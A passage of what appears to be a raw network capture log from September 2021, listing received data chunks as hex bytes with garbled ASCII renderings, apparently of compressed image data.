                                        Data Ascii: v{&U!Y9Y#vG/k(M9=M~}c72vav;V6ehO7Puf8K%H!M`w_v|1+4%F!J<o&zpI 6T)8GEXHhSD7#Gv]t}XVrP<]KNRdV~:%o
                                        2021-09-10 09:33:46 UTC110INData Raw: 81 24 f9 16 6a b8 bf 3c 73 d4 14 aa 01 60 1b d3 f5 f2 60 ba 1e 46 bb d6 35 70 59 a5 79 f2 b6 85 57 99 d9 08 02 ff 00 cb b0 91 cd 1a e0 ff 00 a8 eb d2 d3 f7 0b 5a 84 d7 6f 9a 65 1e 8d eb db 25 b0 dc 1d d1 98 dd 5d 9e 47 f6 e3 e0 5f 34 3a 8c ea 10 06 49 20 f5 e5 e7 eb 10 98 3c 20 ff 00 ed f0 7b ae 91 5b be aa 6b 43 57 d7 f1 f0 50 ed d3 f4 59 97 23 33 6d fe a4 c0 16 8a 28 d4 7e 18 29 90 7f 6a e9 39 b8 52 92 48 bb 8b 16 d7 2f d5 0c 33 20 38 03 61 ec 28 d5 db 98 3b 47 37 fe b0 ce 32 b5 8c 68 65 a4 ff 00 8e 97 2d db 7d 00 11 cc 81 0a 9a 3f f8 6c 8e 0d 02 39 be ab d2 a2 e4 d7 0b 97 ce 95 66 15 d0 16 1c e2 ee 52 65 e0 20 8f 19 2e 0b 58 5f d7 6b f3 84 96 b9 30 9b 35 24 dc 49 1a 76 4e 64 8b 64 06 2e 15 51 c1 f1 61 00 03 f3 57 5d 11 2b 4e 20 1e ea 02 c7 51 b7 af ac
                                        Data Ascii: $j<s``F5pYyWZoe%]G_4:I < {[kCWPY#3m(~)j9RH/3 8a(;G72he-}?l9fRe .X_k05$IvNdd.QaW]+N Q
                                        2021-09-10 09:33:46 UTC111INData Raw: df 9c 46 74 b3 2c 8c 3f c4 9c b4 b9 a5 fe 5e 06 75 4d 48 ae e6 19 0a 4a 90 24 75 90 c6 ad 49 b9 59 9d 8a 93 cf 91 76 78 fc 75 d8 82 d4 9c 0e de 5a 54 5f 3c bf 70 8b f5 4e bb 3b 43 2a 45 91 df 32 34 8c ce 17 7f 24 82 b0 21 21 85 f1 b9 a4 71 5f 1c fc 88 cc 77 6e 4f ca 9d f4 ea 24 20 04 bb 3e 7b dd ed e4 18 d7 72 2d 44 fe af ea 12 a4 39 8c 32 25 ed ef 92 42 59 54 3c 72 6c 62 09 61 61 d6 32 2c 00 15 41 f8 be ad be 9f 29 38 92 f7 72 72 b6 84 8a d4 b5 3c e9 58 a2 fa ac c2 9e 1e 78 e7 4d 43 1a 72 ec 5a 13 fe 83 f5 e4 19 38 a0 b4 91 bb 18 62 c6 62 cf 61 df 1d 3b 92 52 79 46 26 da ff 00 ea a3 5d 6b d1 28 14 25 fe 5f e3 ca 3e 65 c4 4f 29 cf 5d 88 a9 7e c0 df 57 9a 83 d5 b8 d1 6a 4e 7b 88 0b b1 9e 26 2c 83 70 2c 09 5d c0 ed a6 ba 29 41 c1 e8 13 b8 51 81 c5 5a f4 6d
                                        Data Ascii: Ft,?^uMHJ$uIYvxuZT_<pN;C*E24$!!q_wnO$ >{r-D92%BYT<rlbaa2,A)8rr<XxMCrZ8bba;RyF&]k(%_>eO)]~WjN{&,p,])AQZm
                                        2021-09-10 09:33:46 UTC113INData Raw: e5 76 33 7b 3d db a9 a9 68 df e0 11 f1 c0 d5 34 cc ae 45 bb ae fe bb 45 af 0e 84 f0 c7 08 0e a2 c4 1e 7e 4c cd 9e 81 a0 63 55 cb d8 50 87 4f d9 b1 d2 20 de e2 a4 85 91 2c 82 b5 fe 60 49 b3 e7 cf 2b aa 8e c7 f9 3b f7 d6 2c d0 83 30 a5 4a e9 fa ae 96 66 ce 02 f2 f3 62 69 63 56 99 04 bc 86 b7 0b 60 30 07 db 60 d8 55 fd a3 70 fc f4 03 33 0d 45 19 eb 7d bb f7 8b 64 4b 00 87 a8 19 10 4b d3 26 e6 2f ac 08 6b 19 69 36 44 0f 27 ea c7 04 ad ee 0c a7 60 1b 98 38 51 55 40 00 2c 92 0f 8e 90 98 b2 b5 87 c9 40 8b e6 d4 7c c6 d9 08 b2 92 e1 34 17 77 bb 30 cb 4b 64 cd 99 80 1f 50 ea 50 cb 9b 8e f1 ce 56 c3 44 9b 8d 6e 67 6d d5 ff 00 ee 78 35 f1 5f 3d 29 35 43 19 35 a9 ed fb f3 b9 64 21 91 b8 03 cb fa af a4 0b 7a ab 22 61 00 92 04 b3 71 28 db ee 23 f4 cd 1b a2 3d c4 15 5b
                                        Data Ascii: v3{=h4EE~LcUPO ,`I+;,0JfbicV`0`Up3E}dKK&/ki6D'`8QU@,@|4w0KdPPVDngmx5_=)5C5d!z"aq(#=[
                                        2021-09-10 09:33:46 UTC114INData Raw: e6 14 92 01 49 02 ac d5 27 b0 6b ec 1f 5e 8f c8 9b fc 37 b6 8d 8b 90 af 26 3c 65 72 b7 2c cd 8f 9b 03 c4 0a a8 0b ba 32 e3 b7 22 12 40 6d a4 fc 1e 96 ef b2 7d 3d a1 b4 2c 09 63 ee 17 a5 f6 ef ca 26 f3 f4 bf f1 0c 74 9a 6c b8 d1 13 22 48 92 29 d9 97 69 40 dc c4 42 82 63 03 81 77 56 05 f5 e4 ad 28 24 53 bf 3e bb c0 d4 42 83 02 e5 dc e5 ea 6f 1d d7 91 42 b1 52 05 fb 5c 50 17 fc dd df fe 5d 6a e5 24 02 76 f7 3f d4 7c f9 0c ca 7b 38 7a 91 61 e4 df 2f ca 30 6d 7a f9 f2 cc a0 9e 0f bb c2 9a fc 79 15 e4 d7 3d 1a 3b 86 59 71 4a 8f fb 47 d4 df 66 85 a9 b0 2e 88 b1 44 81 f8 5f 91 60 7f a7 17 09 9f c7 af c1 80 94 21 a8 7d 15 fb cf 2c fd 23 dc d9 05 e3 29 18 23 6d a8 35 c3 12 01 f1 f9 3d 07 a7 7f a8 64 58 72 be a1 9a 26 34 94 66 83 f6 a9 60 4e e0 6e c1 07 87 ab e0 79
                                        Data Ascii: I'k^7&<er,2"@m}=,c&tl"H)i@BcwV($S>BoBR\P]j$v?|{8za/0mzy=;YqJGf.D_`!},#)#m5=dXr&4f`Nny
                                        2021-09-10 09:33:46 UTC115INData Raw: 7f 76 c3 44 a8 2c 38 4b a0 d4 08 be 90 9a 95 03 51 5f 53 a6 f9 1e 8d d2 d8 2e 5a 8e 30 58 9a 83 fb 34 1f 36 a4 36 74 bd 6c 34 52 21 8d 92 29 d8 c6 a8 cd fa 6f db 24 05 0a 2f 69 f6 96 7a f1 c7 f1 d4 56 84 e1 05 aa d4 36 26 ad e7 9d 7f 30 57 4b ba 4b 8f f2 ad cf 57 73 57 af 4b 3c 14 60 65 8b 9f b4 0b c6 ea 0a db ee 2a d5 5e c8 81 2b 22 1f fa 4d 72 3f 8e 94 05 69 51 a5 3d ab d8 eb 43 0c 2a 63 25 3e 26 be 43 bb f9 7a 44 92 66 80 f1 a0 55 66 05 2c 30 3d 82 c4 12 18 be e0 21 db b4 0d b5 f1 67 8e 7a 20 29 50 62 6b 72 c2 b4 f3 cb bc a2 20 b3 11 fd c7 a9 75 09 7b 45 9f 74 b0 5b 8b c7 6d e1 59 89 2d bd 83 06 11 86 be 6c df e3 a1 a8 35 de 95 f2 ad f3 de 3b f7 2f 54 f4 3f b8 0c d4 f3 a4 64 66 02 43 b4 ab 46 de 14 50 d9 27 6d 09 d8 d5 bb 89 1c 10 2f 85 be 3a 86 31 a1
                                        Data Ascii: vD,8KQ_S.Z0X466tl4R!)o$/izV6&0WKKWsWK<`e*^+"Mr?iQ=C*c%>&CzDfUf,0=!gz )Pbkr u{Et[mY-l5;/T?dfCFP'm/:1
                                        2021-09-10 09:33:46 UTC116INData Raw: 49 b9 1f f3 07 34 a3 fc bf b1 8f 07 93 5d 15 3c 48 49 6a 51 ed 71 d9 b1 1b 73 82 a4 e3 2c 0b e7 5d 05 cf 47 f7 cc 46 08 35 69 92 6d 8a e5 1e 30 64 59 9c 90 ac 07 b4 00 28 a2 ab 12 4a a9 36 7e 01 be 98 13 82 92 6a 4b 8f 7b 67 eb 0c 21 36 19 5c e9 f9 db 58 3a c2 d6 27 78 18 c8 60 b9 63 45 27 f6 b1 92 32 1e d5 43 18 ed ea 9b c5 df fa 74 7f f0 eb f9 df bf 58 02 92 53 31 d0 d5 f5 dc 5e 8d 97 e9 89 70 7d 5b 8a f0 ac 6a f3 7e 82 82 e3 22 22 51 17 7e d6 2a 2f 71 f7 58 55 56 14 45 92 07 47 0b 45 98 7f fc b6 84 26 f0 a7 ee 0b 97 2e 58 ea f4 d3 98 ad 33 66 89 26 d7 20 96 14 31 ac 85 a3 21 cb 31 24 10 18 a9 14 6f 6e f3 c6 df 9f 8b 03 a0 a9 7e 22 cc ce f9 e9 cf b3 11 ff 00 6f 70 f6 ca 83 95 f6 f2 dd e3 53 2f 2e 57 8e a0 54 c7 bb 73 1b 1b bf 95 04 70 b7 47 8a be 2b e7
                                        Data Ascii: I4]<HIjQqs,]GF5im0dY(J6~jK{g!6\X:'x`cE'2CtXS1^p}[j~""Q~*/qXUVEGE&.X3f& 1!1$on~"opS/.WTspG+
                                        2021-09-10 09:33:46 UTC118INData Raw: 16 05 fa 3e 79 5f 91 e7 10 02 38 b1 f2 a3 19 0e 5f 1f 32 44 81 d5 63 21 b7 c8 19 5a 8e eb 0c 18 ab ed 34 01 52 cb 67 cc 93 30 f8 ca a8 49 61 9b b5 ef 6c af fb 15 f2 d2 a9 8c 05 00 bf 37 ee f4 7d ac 5f a1 6f 9f 0a 04 ee 15 c8 c1 6c bc 6c a3 21 36 42 6e fb 72 e4 8a 56 76 0e 94 78 25 ba ae 9a 30 cc 2a 1f e5 96 df 37 f4 8b 34 80 90 12 92 69 fc bd ed e7 78 8e c9 87 1f ee e3 c3 a7 12 1c e0 98 d3 a2 8b c6 9e 54 57 c7 2a c7 dc 11 df 74 52 a9 24 02 77 0a 23 a9 8f 10 e9 50 29 6b f7 d6 39 89 42 60 76 6f 2d 9b 99 cf 96 b0 d6 cc 56 cb d4 f4 5f 52 64 41 1a f7 c4 78 9a 9a c6 9b 12 2d 5b 0e 38 a0 ca 52 09 62 61 99 04 33 03 c0 62 cf 43 8e 14 0a 20 2d 3a b9 ea 46 5c b2 2d be 90 e2 c5 12 aa 96 15 f8 ed ee 61 87 e9 fd 67 0f 4c d6 4c 79 b0 c9 3e 14 78 59 6d 0c 30 d2 19 a6 0e
                                        Data Ascii: >y_8_2Dc!Z4Rg0Ial7}_oll!6BnrVvx%0*74ixTW*tR$w#P)k9B`vo-V_RdAx-[8Rba3bC -:F\-agLLy>xYm0
                                        2021-09-10 09:33:46 UTC119INData Raw: 14 d2 a2 9a 21 c4 23 ed 2d 2a 72 f8 81 c4 79 f7 96 b9 45 f9 f4 66 ab 2a 61 68 f3 98 99 e1 c9 c3 c2 3d e4 a9 0c 6c 51 15 c9 1e 43 6e 1b 77 af 1f 3c 8e b1 bc 5c bc 3c 4c c3 5b d3 26 e5 af 57 8f a1 7d 36 6b f0 92 88 bb 57 d1 ad ca cd 16 1f 40 d5 23 9b 3b 34 4f 36 c7 6e c1 8e 55 e3 7a 2e d0 19 df fc 92 82 29 d7 80 cb e3 cd 74 8c d9 52 c8 2a c2 ea b0 56 6f 5b 9e cf 47 8b ce 1d 6a 52 80 2a 25 25 25 83 e6 1b 4c c4 59 9f 47 ea 0e 54 02 d0 cc 23 01 15 b7 5b 46 0d f2 f7 ee 56 6e 76 f0 0d 5d d0 27 aa 75 82 ea 49 2e 0d d3 95 6e f7 e5 1a be 0a 6a 7e dd 17 95 00 3a 8d 2f 73 ee 74 8b 1f e9 9d 4f 68 85 9c 99 d6 70 19 ce fa d8 91 ed 0a c8 a4 d5 f1 44 f8 24 5d fc 94 a6 c9 48 a8 4d 36 7b 79 e5 1a 2e 17 88 08 40 a9 07 98 3b 0f 50 0b 16 73 46 87 4e 91 aa 45 90 a4 df b5 18 10
                                        Data Ascii: !#-*ryEf*ah=lQCnw<\<L[&W}6kW@#;4O6nUz.)tR*Vo[GjR*%%%LYGT#[FVnv]'uI.nj~:/stOhpD$]HM6{y.@;PsFNE
                                        2021-09-10 09:33:46 UTC120INData Raw: 8f 2e 2e 9e da 4c d9 99 91 48 59 60 50 b1 84 8d 94 33 fc 6d 76 8d a9 49 b3 19 36 41 ae 7a a9 9b c5 09 c1 7f f2 12 e0 b0 77 ab 8e ce 91 73 27 83 9a 56 00 05 29 34 2d 6d 2c de b1 6a be 99 7f 4b fe b0 f5 40 c4 c2 d3 60 c8 f4 de 04 e6 1f b8 d5 24 0e 72 12 12 db 1b ed 92 39 1b 19 a5 68 e8 83 2c 61 01 a6 23 cf 49 2d 72 82 43 b1 34 ad 1d cd eb bf 56 8b ee 13 82 4c a7 33 70 a8 33 a4 2a 95 77 63 5d 74 ab 5a 91 d8 cf e9 f7 fa 75 f4 d7 d2 4d 1e 28 52 79 f5 6d 42 65 66 c9 d5 f5 44 85 75 09 64 2a b6 bb e3 89 50 45 ee b0 a8 80 50 e7 a4 38 89 c9 4a 99 80 4d f4 f5 ef f0 ac f9 bc 54 e5 30 43 07 2d 42 13 96 55 bb 53 f2 62 e1 62 c5 8e ca b0 08 c3 70 a3 bb 65 82 ad 6d 50 82 95 41 bb 24 d6 e3 63 c5 5f 49 2d 61 56 cf a3 7a 57 b3 03 08 98 81 fc 94 14 2e 01 b1 ea 0f 2f 5a 88 92
                                        Data Ascii: ..LHY`P3mvI6Azws'V)4-m,jK@`$r9h,a#I-rC4VL3p3*wc]tZuM(RymBefDud*PEP8JMT0C-BUSbbpemPA$c_I-aVzW./Z
                                        2021-09-10 09:33:46 UTC122INData Raw: 79 24 a1 80 c7 22 c9 89 3c 6c ac 2d e2 c8 91 1c 87 14 a8 59 97 cf 55 0b 42 a6 4b 52 4b 95 02 a7 71 93 96 f4 2c db 69 58 d1 49 9a 94 2d 24 1a 61 41 d5 e8 03 03 7b 57 66 ad e1 f1 36 3c fe a8 f4 7c da 5e 46 39 93 23 32 29 f2 71 64 28 01 59 f0 58 a4 5b 4b 59 1b fb 7b b7 0a 05 4f 92 0f 59 e9 0b 1c 3f 16 54 a6 01 c8 d0 39 39 8e 76 39 0a de 2d e7 a3 ef 4a d4 10 fd 8a 5f f5 15 c3 5e c2 19 ba 5b cc 17 60 8c af 7d 2c 83 8f 34 28 52 78 14 d5 da 94 de 9c 8e 3c 1e b4 bc 1c cc 20 13 50 a5 05 02 74 b5 34 0e d6 1f bc e7 12 87 4a a5 9b 8f 40 39 da fc bc a1 5b a4 2e 4e 2c f3 45 94 56 4c 4c f9 1e 17 94 2d b9 87 24 32 63 b4 a5 ff 00 69 dc 36 97 fd c1 40 af 3c 5c ad 45 d0 45 28 68 f9 d4 00 fa fb c5 30 97 84 4d 25 4e ce 0b ec 45 3d 59 ff 00 b8 c5 a8 60 47 93 88 91 43 9c 5f 53
                                        Data Ascii: y$"<l-YUBKRKq,iXI-$aA{Wf6<|^F9#2)qd(YX[KY{OY?T99v9-J_^[`},4(Rx< Pt4J@9[.N,EVLL-$2ci6@<\EE(h0M%NE=Y`GC_S
                                        2021-09-10 09:33:46 UTC123INData Raw: c7 c5 f4 76 98 99 32 22 3f f8 6e 6e 54 44 9a 2c d2 87 0b da 65 0a 03 29 65 04 9f 9b 00 93 d5 72 e5 63 98 e9 2c ed 99 a7 b0 bf b9 8b 14 a8 04 8e be ff 00 b8 5e c4 f1 67 fa 62 3d 33 24 40 27 7d 3c b8 69 3e 64 91 0c 5e 58 d7 70 a8 8e 44 bb 2e 40 5f 8e 48 94 19 6b 4d 5e f4 77 14 f2 88 4c c1 84 8d 7b 66 df 96 74 b4 06 fa 36 2c d6 d3 3d 41 83 8f 0a a4 a6 1e cb ee 65 b6 31 c6 32 95 c2 9a f7 b2 2d c7 f1 40 fc 74 c4 c3 e0 04 b5 c3 f9 f7 d4 40 24 a0 85 9a 9c 00 1a 51 f2 67 c8 77 a4 44 6a b9 39 9a 6e bd e9 0c 9e fb 49 89 a8 e7 39 95 97 6a 85 9a 34 1b 15 f6 fe 37 95 04 7c 71 cf 9e 88 80 85 4b 51 f1 52 bf 3a 75 c8 56 b0 39 8e 66 04 7f 8a bf 91 37 19 bb d0 65 a6 d4 88 4d 67 14 03 34 92 22 a2 ca f9 71 4a de 18 33 b1 45 6d dc 92 4b b2 92 09 04 71 d4 e5 ac 05 a6 60 ba 68
                                        Data Ascii: v2"?nnTD,e)erc,^gb=3$@'}<i>d^XpD.@_HkM^wL{ft6,=Ae12-@t@$QgwDj9nI9j47|qKQR:uV9f7eMg4"qJ3EmKq`h
                                        2021-09-10 09:33:46 UTC124INData Raw: 34 26 63 7d 63 d3 19 d1 ea 9a 26 63 e0 e7 2b 15 2d 1c 87 84 52 7f 49 62 27 b4 eb fe 53 1d 05 ab 36 09 e9 e3 31 13 53 84 b1 4d 9d be 6b d6 2a 4c 8e 23 86 56 29 78 83 1d f9 e4 1f e6 d5 20 43 77 48 fa c2 f9 4a b1 6b f0 cb 0e 5c 5d b4 39 78 a0 98 66 35 c3 98 41 dd 18 b3 ef 20 fe e3 c7 02 8a 93 78 34 d9 fc cf 5e 94 b0 ad 05 af 16 bc 2f d5 56 7f f2 93 b1 ab f7 b1 19 c3 5f 4a fa 95 a1 c2 85 e6 d4 a4 42 8c 94 b1 23 77 77 55 a8 93 f1 ee ab 26 eb cf f3 d5 6c ce 0c 02 79 de 8f 56 ef ce 2f 13 c7 ac 80 50 a2 c5 ef 7e e9 b4 1c 60 6b af f5 0a 5c 18 73 fb 9f e0 d8 cc 04 50 09 7b 72 19 a3 62 7b 8c 9f b1 c4 96 0d b9 dc c3 fc b7 7d 08 e0 90 96 70 f9 db 3b 79 dc f4 b4 31 28 4c e2 96 9c 45 4c 74 a1 a7 21 a5 e2 f0 7d 2d f4 46 97 90 71 95 21 06 08 92 38 fb 6d 1a 13 22 b0 3d a1
                                        Data Ascii: 4&c}c&c+-RIb'S61SMk*L#V)x CwHJk\]9xf5A x4^/V_JB#wwU&lyV/P~`k\sP{rb{}p;y1(LELt!}-Fq!8m"=
                                        2021-09-10 09:33:46 UTC125INData Raw: 26 cf 02 19 b1 f7 3f e6 0d ea 84 08 d5 d7 b6 24 60 08 60 f5 c9 6e 6e ec 81 60 03 c5 74 e2 70 e5 72 c6 f6 c9 bc fb ac 66 e7 82 a5 62 04 ea c6 a1 bc f6 63 ca 2a d7 d6 42 d1 fa 7b 58 85 41 de d0 3c 11 05 3b 64 de 64 a1 5b 87 ba af 9f 1b 80 35 7e 3a bc fa 6b 85 05 0d 5a b9 52 f4 cb 2f 7c db 2b f5 49 81 12 d5 ad 45 b5 7b c7 17 3e ad eb 69 a6 ea 99 71 cf 16 c9 a2 7e c0 32 a2 b2 b3 b4 2a 5a 48 ff 00 ea 06 3e 28 fe d6 66 fe 3a fa 3f d3 a5 95 4a 0a ae 66 9c 9c 39 3c ab 6f 98 f9 0f d5 a7 21 33 56 01 a1 51 37 e4 d6 b6 d5 fd 43 69 fa 6c 9a d7 a5 7d 64 a1 56 55 97 4b d2 5b 1e 2a 01 a3 ed b4 bb d9 87 21 41 04 11 5f 80 6c 74 61 39 32 a7 90 ec 74 6a bb 50 8c b9 0d b3 8a dc 06 64 92 a6 a1 a1 6e 8c 5d de 94 ac 0b 7a 33 0c cd a0 6a 8c b6 cb a6 6b 5a 7e 30 a5 1c 63 a4 4f 8a
                                        Data Ascii: &?$``nn`tprfbc*B{XA<;dd[5~:kZR/|+IE{>iq~2*ZH>(f:?Jf9<o!3VQ7Cil}dVUK[*!A_lta92tjPdn]z3jkZ~0cO
                                        2021-09-10 09:33:46 UTC127INData Raw: 05 8e 7f f5 fc 75 e0 9c 00 e7 4e 56 8e 8a 3a 1a ea a9 de 83 fb 0f eb 1c d9 fe a0 75 b9 e5 ce c9 8d c8 78 e5 79 26 dc 77 16 10 a5 a4 62 87 e4 01 4a de 2c d0 3c 74 a7 10 7f 8e 58 94 de 75 87 e4 80 0a 2b 40 c7 d6 80 f9 f5 f4 8a 9d e8 c8 22 93 51 d5 35 57 9c f6 e0 31 00 36 10 54 72 58 d9 14 76 d7 c1 bf f6 00 d7 f1 09 b2 0d 42 bd 1a b5 1a e9 af 28 b4 92 42 54 b5 82 f8 88 e4 05 ba be 8d 08 7f a9 92 24 99 39 53 2c 8e 4c b9 19 0f dd 2c 4e d1 e2 3d aa b7 7c 1f 34 3e 45 7c f4 e7 02 e9 f0 a4 b3 67 d2 dc bd 77 84 b8 d1 52 41 1e ee 3b f6 a6 50 0f e9 15 10 e6 e0 c1 24 8a 5e 6c 85 9d 50 b6 c6 03 b8 a1 5c 11 61 59 b9 1b 6b cf f7 e9 ae 21 d8 a8 d5 c1 77 77 d4 d7 2c bb 68 e7 04 a6 71 9d 2a fd 6d 5e e8 61 cb ad 8f b8 d6 74 dc 48 d4 01 91 24 05 19 80 12 99 27 90 42 58 91 c1
                                        Data Ascii: uNV:uxy&wbJ,<tXu+@"Q5W16TrXvB(BT$9S,L,N=|4>E|gwRA;P$^lP\aYk!ww,hq*m^atH$'BX
                                        2021-09-10 09:33:46 UTC128INData Raw: 27 42 f4 7c e1 87 a3 e3 9c 86 8d e7 3d b8 e2 6b 54 51 fb c0 21 63 0c 14 fb a4 52 6c 9a 36 3f b1 e8 c8 95 87 27 f4 f2 a3 81 d8 80 4c 9a b2 ac 41 4d 5b 3f 3b bb 79 d1 fc a1 81 87 84 00 91 1a 37 ef 2a 99 54 33 59 17 ca aa a0 2b 5f f5 1d c0 80 3e 47 47 42 42 85 3c 26 bb ea 2f 7b c7 84 f5 1b 92 75 1e f6 f2 d7 6b 46 5c ad 2e 37 82 55 09 b8 40 49 74 2c 2c 32 94 74 62 49 ab 52 7f 6d 9f 1e 3a 34 b2 30 00 a4 b9 0e e4 d3 33 96 de f6 30 05 61 52 ca ad 8b ab 5a f5 1c df 2b 55 a0 17 57 f4 d4 79 6d b8 c0 aa 63 6d d0 b6 c0 cf 1c 8c 09 dc 08 00 7e a0 62 0f 8a 07 8a e3 a9 a2 6a 9c 10 e9 02 87 57 70 75 3d 6a 79 dc 08 ae 5a 48 ad 6e c7 4b 79 fa 5a 13 9e a2 fa 7f f7 07 fe 45 f7 03 38 b0 54 83 64 32 11 7c a9 a2 6e f7 10 2a b9 ea c6 5f 13 87 0b d8 d4 10 5e a3 30 33 bd 0d b5 06
                                        Data Ascii: 'B|=kTQ!cRl6?'LAM[?;y7*T3Y+_>GGBB<&/{ukF\.7U@It,,2tbIRm:4030aRZ+UWymcm~bjWpu=jyZHnKyZE8Td2|n*_^03
                                        2021-09-10 09:33:46 UTC129INData Raw: ea ef 47 b0 16 cf d4 d9 9e 57 ec c8 d0 22 77 3b fd ef d4 62 80 6c 8f 95 00 82 49 f2 2f e7 9e ba a2 50 58 54 db d2 0e 85 b3 82 7a bb 7c 39 6d 2d f2 37 9f a9 1e c7 70 b8 fd 76 40 25 4f f9 88 1c 85 3d df 1c 77 18 2b b0 17 4a 2f 8e 3a 19 40 0c 49 04 9a 12 df c5 f3 27 41 f3 13 2b c4 d5 b5 68 74 eb ae 8d a3 c0 0e a2 92 2c dd dc 89 e3 09 1c 72 17 de ff 00 a6 cf bb 6d 85 52 4f 37 63 dc 01 aa a3 d0 e6 49 35 28 2f f3 5a d0 9f 9b c7 3e f8 52 b0 81 cc bb f3 19 7a 1e ba 2d f5 dd 49 4c 72 e3 c0 76 03 b3 bb 38 76 89 5e 48 e4 16 54 af b9 41 1e d5 00 7b 8d 03 43 9e 86 99 44 e6 1e b6 14 fd 47 8a 9a e1 f7 39 57 95 6e ed b6 cd 10 d3 4e 5f 73 28 12 6d 09 ee b2 ce ac e2 98 1f c2 9a 04 d9 e4 fc 81 5d 31 2e 5e 07 ab 93 b7 f7 f1 9e b0 bc c9 a0 39 1e 59 35 72 dd c5 32 6b d6 21 93
                                        Data Ascii: GW"w;blI/PXTz|9m-7pv@%O=w+J/:@I'A+ht,rmRO7cI5(/Z>Rz-ILrv8v^HTA{CDG9WnN_s(m]1.^9Y5r2k!
                                        2021-09-10 09:33:46 UTC130INData Raw: 29 8d 70 b1 49 df 13 46 3f 78 d9 26 ca 65 25 85 10 dc 72 35 55 38 95 5c 9a da f9 f7 58 60 0a b2 7c 2d d7 d3 5a ea 79 44 a6 36 4c 53 ea 5d dc 6c 87 4e f6 14 93 4d 0a 30 42 92 3c f0 d5 6d 04 34 6a 01 0b 74 56 c0 37 7d 1a 4a 18 3a 48 0e 05 83 df 73 09 71 2b 0e 19 35 14 bf eb 6f 9c e3 fa 13 c7 20 7f 9b dd 5b 80 02 c8 1c 8f fc ef fb 1e b4 25 4a 29 6a 3d 3d fb b4 62 14 09 04 0b ef 4e 91 95 99 9b da f4 55 c3 00 6e 8d 8e 6e c5 78 36 7c f5 c4 96 3a 39 01 43 98 b6 f7 6a 5e 01 67 d4 7b f7 a4 7b 88 49 dc 02 23 c2 a8 f7 73 ee 04 d7 20 9a e3 f3 d4 a7 29 92 c2 e7 cb 46 eb f1 05 42 b1 0d 4e bb 7e bb d8 6b d4 82 4c cc dc 3d 13 71 11 a4 91 6a 59 cd 5e c3 00 b3 8f 01 16 46 e9 76 6e b3 f0 28 0e 97 90 a5 32 b2 38 88 e5 af ae 7c a3 cb 03 0b e6 19 b9 3b 37 7f 30 71 0b 2a e2 81
                                        Data Ascii: )pIF?x&e%r5U8\X`|-ZyD6LS]lNM0B<m4jtV7}J:Hsq+5o [%J)j==bNUnnx6|:9Cj^g{{I#s )FBN~kL=qjY^Fvn(28|;70q*
                                        2021-09-10 09:33:46 UTC132INData Raw: 46 71 bb 8d 24 4a e8 55 76 b1 0f 16 fe 77 4b 56 ac 8e 38 25 8d 01 7f 3d 53 f1 4b fb 8e 84 7f 81 6a e7 ad de 35 5c 1c c0 97 c6 59 ea 39 87 b9 15 be ef a5 21 8d 83 37 dd ad 34 aa 64 55 59 04 b2 1f f9 6e 38 01 96 3e 19 18 80 bc 92 39 da 79 ea a6 62 08 20 f8 6b be 75 8b 9e 1e 65 c9 2e 09 a5 f6 f2 f6 17 82 3c dd 52 3c 4d 36 42 64 98 e5 24 68 23 18 f1 b7 eb b3 46 a3 68 1b 4e c8 f7 96 ed 8e 38 3c f3 d2 4a 07 10 09 b3 db 36 a1 d3 bc e2 d3 ee 27 08 c8 81 d1 c3 0b 5b 2e a6 fa 46 a7 a5 fd 07 9b aa 30 d6 f5 7b 0a e5 a5 c7 c5 63 bd e4 89 b6 9a 94 15 bd ca 40 3b 45 1d de 3a e4 d4 e1 4f 87 3b ef ad 77 a7 74 80 89 ab 36 a9 e4 1b 77 7f 4e 9c 83 43 17 1a 14 90 e2 b2 04 ed a8 dd 5b 55 85 da 82 6e b6 f1 e4 79 a0 2b cd f4 35 25 04 05 24 57 f9 17 19 06 7a 1f ed a0 2b 9a b0 d5
                                        Data Ascii: Fq$JUvwKV8%=SKj5\Y9!74dUYn8>9yb kue.<R<M6Bd$h#FhN8<J6'[.F0{c@;E:O;wt6wNC[Uny+5%$Wz+
                                        2021-09-10 09:33:46 UTC133INData Raw: dd 23 5f ee 6e 2f 68 e4 2f 82 78 f2 6c 2d 39 2e 40 34 e5 95 b9 eb 05 93 34 a5 40 a5 44 a7 fa df ca b7 84 be a8 23 89 9a 06 70 d2 45 5b 48 50 15 01 15 db 62 fb 4d 23 12 a5 41 2d f2 01 1c f5 14 12 92 30 b9 d8 eb d5 fc ce 51 67 26 79 2b 0e aa 67 7d 5f a5 bc a0 33 21 5a 09 48 8e 18 e6 6e d9 21 43 92 1e 2d ff 00 aa 17 fc c1 d8 05 b6 f2 a1 78 ae 7a 3a 15 e2 2e f5 a3 8a 87 bf e7 21 90 d2 2c 14 b1 30 32 4d ec f4 0c d5 af 3f 4b bd 1b d1 d4 15 51 6e 65 63 0a 48 a3 1b 90 b2 46 58 95 ab a0 7b 7c ee dc 43 37 9f 15 d1 aa ed 46 6b bd 7c bb e7 1e 96 85 84 90 5a aa 39 e5 6a b5 2f cc 83 e9 ee 2d 4c c8 b2 15 db b1 00 0f 0c 6a 58 ab 2d 16 2a ca c4 fb d2 c7 e0 58 be 14 f4 44 a9 c8 72 28 0d 4f 4e df f3 02 9d 89 93 84 66 6e 6b 96 6d db ef 1a b9 bf f1 d0 4d 24 69 97 8d 0c 45 65
                                        Data Ascii: #_n/h/xl-9.@44@D#pE[HPbM#A-0Qg&y+g}_3!ZHn!C-xz:.!,02M?KQnecHFX{|C7Fk|Z9j/-LjX-*XDr(ONfnkmM$iEe
                                        2021-09-10 09:33:46 UTC133INData Raw: 41 49 00 10 48 a8 7e 7c bd 7a d2 02 8e 20 33 87 7a 65 4c a8 6b 5d da 01 f5 34 8e 44 30 ac 6a 65 67 72 cc 11 96 81 52 58 ee e7 73 5d 1a 02 cf 8f e3 af 09 64 3b 80 2b 56 73 fb ec c3 42 70 12 88 52 bc 45 d8 8b 87 66 f2 39 13 7a e4 f1 07 14 39 6a 02 01 ba 47 40 0b c4 85 ad c1 04 17 55 ba 35 cd b7 83 e4 0f 1d 45 45 23 3a 75 d2 2b d7 36 85 2e ec ef e7 4f 37 67 89 3c 4f bd 9a 29 4c 50 ef 38 87 b4 cf 33 04 0e eb 61 e3 da 85 77 2e d2 58 8b 20 30 51 f9 e8 13 16 2f 5d 2d dd 3b 3b 05 94 73 0c 79 d1 fb f7 d4 c4 06 b5 8d 1a 45 39 52 b4 56 20 aa bf b9 91 b9 20 93 c8 65 36 a6 bf 82 3a 83 92 c5 36 7a 9b 30 63 ed e5 4c e1 49 a8 18 80 17 24 bd a8 00 34 07 90 a7 2b 08 a1 7f d4 0e 20 97 46 cf c6 ee 8c 68 e5 8b 26 36 99 94 ba dc 91 ec 45 65 fe 6d b9 1c 8f 9e 38 eb 57 